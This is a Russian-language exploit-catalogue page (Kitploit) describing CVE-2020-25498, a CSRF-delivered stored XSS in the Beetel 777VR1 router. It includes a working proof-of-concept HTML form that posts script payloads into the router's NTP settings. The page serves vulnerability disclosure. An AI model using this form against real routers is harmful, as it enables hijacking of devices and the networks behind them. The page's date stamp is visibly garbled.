Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/the-girl-who-lived/cve-2020-25498
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

Хранимый XSS через CSRF в роутере Beetel 777VR1

Репозиторий
335 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-25498: Хранимый XSS через CSRF в маршрутизаторе Beetel 777VR1

Описание уязвимости

Было выявлено, что уязвимая конечная точка не имеет проверки ввода на стороне сервера и не обеспечивает фильтрацию на стороне клиента от внедрения вредоносных скриптов. Злоумышленник может использовать эту уязвимость для внедрения вредоносного скрипта в конечную точку, и скрипт активируется каждый раз, когда пользователь открывает уязвимую конечную точку. Злоумышленник может отправить вредоносный URL с полезной нагрузкой POST-запроса, чтобы выполнить XSS в административном модуле через CSRF, получить контроль над устройством и, в конечном итоге, над сетью.

Исследователь: Sayli Ambure (https://twitter.com/sayli_ambure)

Ссылка на CVE в MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

Эксплойт Proof-of-Concept:

HTML-код CSRF:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. Имя NTP-сервера в модуле настройки системного времени

Параметр: имя сервера

Видео Proof of Concept:

2. Конечная точка фильтра URL в модуле межсетевого экрана

Параметр: ключевое слово

Видео Proof of Concept:

Скачать инструмент